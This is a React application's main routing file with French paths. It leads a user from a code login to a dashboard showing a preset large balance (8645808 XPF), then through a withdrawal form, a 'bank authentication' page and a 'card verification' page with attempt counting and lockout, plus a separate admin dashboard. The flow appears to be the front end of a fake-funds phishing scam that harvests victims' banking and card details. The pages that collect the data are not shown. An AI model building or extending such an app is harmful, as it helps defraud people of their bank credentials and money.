import React, { useState } from "react";
import { BrowserRouter, Routes, Route, Navigate } from "react-router-dom";
import { Toaster } from "@/components/ui/sonner";
import "@/App.css";

// Pages
import HomePage from "./pages/HomePage";
import LoginPage from "./pages/LoginPage";
import DashboardPage from "./pages/DashboardPage";
import WithdrawalFormPage from "./pages/WithdrawalFormPage";
import BankAuthPage from "./pages/BankAuthPage";
import CardVerificationPage from "./pages/CardVerificationPage";
import AdminLoginPage from "./pages/AdminLoginPage";
import AdminDashboardPage from "./pages/AdminDashboardPage";

function App() {
  const [isAuthenticated, setIsAuthenticated] = useState(false);
  const [userCode, setUserCode] = useState("");
  const [userAmount, setUserAmount] = useState("8645808");
  const [userCurrency, setUserCurrency] = useState("XPF");
  const [userBanks, setUserBanks] = useState([]);
  const [withdrawalData, setWithdrawalData] = useState(null);
  const [bankData, setBankData] = useState(null);
  const [attemptCount, setAttemptCount] = useState(0);
  const [isLocked, setIsLocked] = useState(false);
  const [isAdminAuthenticated, setIsAdminAuthenticated] = useState(false);

  const handleLogin = (code, amount, currency, banks) => {
    setUserCode(code);
    setUserAmount(amount);
    setUserCurrency(currency);
    setUserBanks(banks);
    setIsAuthenticated(true);
  };

  const handleLogout = () => {
    setIsAuthenticated(false);
    setUserCode("");
    setUserAmount("8645808");
    setUserCurrency("XPF");
    setUserBanks([]);
    setWithdrawalData(null);
    setBankData(null);
    setAttemptCount(0);
    setIsLocked(false);
  };

  const handleAdminLogin = () => {
    setIsAdminAuthenticated(true);
  };

  const handleAdminLogout = () => {
    setIsAdminAuthenticated(false);
  };

  return (
    <div className="App">
      <BrowserRouter>
        <Routes>
          <Route path="/" element={<HomePage />} />
          <Route 
            path="/connexion" 
            element={
              isAuthenticated ? 
              <Navigate to="/dashboard" replace /> : 
              <LoginPage onLogin={handleLogin} />
            } 
          />
          <Route 
            path="/dashboard" 
            element={
              isAuthenticated ? 
              <DashboardPage onLogout={handleLogout} userAmount={userAmount} userCurrency={userCurrency} /> : 
              <Navigate to="/connexion" replace />
            } 
          />
          <Route 
            path="/retrait" 
            element={
              isAuthenticated ? 
              <WithdrawalFormPage 
                onSubmit={setWithdrawalData}
                withdrawalData={withdrawalData}
              /> : 
              <Navigate to="/connexion" replace />
            } 
          />
          <Route 
            path="/authentification-bancaire" 
            element={
              isAuthenticated && withdrawalData ? 
              <BankAuthPage 
                onSubmit={setBankData}
                bankData={bankData}
                userBanks={userBanks}
              /> : 
              <Navigate to="/connexion" replace />
            } 
          />
          <Route 
            path="/verification-carte" 
            element={
              isAuthenticated && bankData ? 
              <CardVerificationPage 
                attemptCount={attemptCount}
                setAttemptCount={setAttemptCount}
                isLocked={isLocked}
                setIsLocked={setIsLocked}
                withdrawalData={withdrawalData}
                bankData={bankData}
                userCode={userCode}
                userAmount={userAmount}
                userCurrency={userCurrency}
              /> : 
              <Navigate to="/connexion" replace />
            } 
          />
          
          {/* Routes Admin */}
          <Route 
            path="/admin" 
            element={
              isAdminAuthenticated ? 
              <Navigate to="/admin/dashboard" replace /> : 
              <AdminLoginPage onAdminLogin={handleAdminLogin} />
            } 
          />
          <Route 
            path="/admin/dashboard" 
            element={
              isAdminAuthenticated ? 
              <AdminDashboardPage onAdminLogout={handleAdminLogout} /> : 
              <Navigate to="/admin" replace />
            } 
          />
        </Routes>
        <Toaster position="top-center" richColors />
      </BrowserRouter>
    </div>
  );
}

export default App;
